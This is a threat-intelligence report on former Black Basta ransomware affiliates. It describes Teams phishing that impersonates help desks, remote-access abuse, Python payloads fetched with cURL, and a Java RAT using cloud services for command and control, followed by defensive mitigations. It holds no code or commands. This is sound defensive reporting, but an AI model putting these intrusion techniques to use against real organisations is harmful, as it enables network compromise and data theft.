Full Report
Former members tied to the Black Basta ransomware operation have been observed sticking to their tried-and-tested approach of email bombing and Microsoft Teams phishing to establish persistent access to target networks. "Recently, attackers have introduced Python script execution alongside these techniques, using cURL requests to fetch and deploy malicious payloads," ReliaQuest said in a report
Analysis Summary
# Threat Actor: Former Black Basta Affiliates (Evolving Ransomware Actors)
## Attribution & Identity
Former members associated with the **Black Basta** ransomware operation.
**Known Aliases and Associated Groups:** Affiliates are suspected to have migrated to or formed new groups, notably **CACTUS RaaS group**, **BlackLock**, or potentially influenced the **BlackSuit** ransomware group.
## Activity Summary
Following the decline of the Black Basta brand after internal chat log leaks in February 2025, former members are observed pivoting their tactics. They are continuing to employ well-established social engineering techniques, primarily email bombing and Microsoft Teams phishing, to gain initial access. Recently, they have incorporated Python script execution via cURL requests to deploy initial payloads. Some observed activities suggest the adoption of Black Basta's initial access strategies by the **BlackSuit** ransomware group. The shutdown of the Black Basta data-leak site suggests affiliates either joined another RaaS or formed a new entity.
## Tactics, Techniques & Procedures
- **Initial Access:** Email bombing and Microsoft Teams phishing.
- **Initial Access Vectors:** Attacks leveraged `onmicrosoft[.]com` domains (50% of observed Teams phishing) or compromised, legitimate domains (42% during Feb–May 2025) for phishing.
- **Post-Exploitation/C2 Establishment:**
- Establishment of initial Remote Desktop sessions using **Quick Assist** and **AnyDesk**.
- Downloading and executing a malicious **Python script** to establish Command-and-Control (C2).
- **Credential Harvesting & Persistence:** Using updated variants of a **Java-based RAT** previously seen in Black Basta attacks. This RAT now abuses cloud services (Google Drive, OneDrive, Google Sheets) as C2 proxies/exfiltration points.
- RAT capabilities include: credential harvesting from web browsers, initiating SOCKS5 proxy tunnels, file transfer, presenting fake Windows login windows, and executing Java classes in memory.
- **Additional Tooling:** Use of the tunneling backdoor **QDoor** (previously attributed to BlackSuit) and a **Rust payload** likely custom-built for the SSH utility.
- **Evolving Tactic:** Increased use of Python scripts for payload deployment post-initial access.
## Targeting
- **Sectors:** Finance, Insurance, and Construction sectors have been specifically targeted via Teams phishing impersonating help desk personnel.
- **Geography:** Not explicitly detailed, but associated groups often target global entities.
- **Victims:** Specific named organizations are not listed, only the targeted sectors.
## Tools & Infrastructure
- **Malware Families Used:**
- Java-based RAT (updated variant).
- QDoor (tunneling backdoor).
- Anubis (Python RAT).
- Rust payload (SSH utility loader).
- **Infrastructure (C2):**
- Abuse of legitimate cloud services for proxying commands/data: **Google Drive**, **OneDrive**, and **Google Sheets**.
- Remote addresses used for fetching Python scripts.
## Implications
The continued adaptation by former Black Basta affiliates demonstrates the resilience of established ransomware operators, who quickly pivot to successor groups or new structures after major operational setbacks. Their migration towards abusing legitimate Cloud Service Providers (CSPs) for C2 and data exfiltration presents a significant challenge for network defenders, as this traffic blends well with normal organizational activity. The adoption of Python scripts suggests a shift towards more versatile, less signature-dependent initial deployment methods.
## Mitigations
- Enhance scrutiny and verification protocols for all email and Microsoft Teams communications, particularly those impersonating internal IT/Help Desk personnel.
- Investigate and restrict cURL usage aimed at external, non-standard repositories during initial access stages.
- Monitor for the deployment (or execution attempts) of Python scripts originating from initial access vectors that then establish C2 communications or download larger payloads.
- Implement robust monitoring on outbound traffic to CSPs like Google Drive and OneDrive for anomalous file transfers or unexpected command-and-control patterns associated with known RAT activity.
- Review endpoint detection rules for the Java-based RAT, QDoor, and Anubis RAT indicators.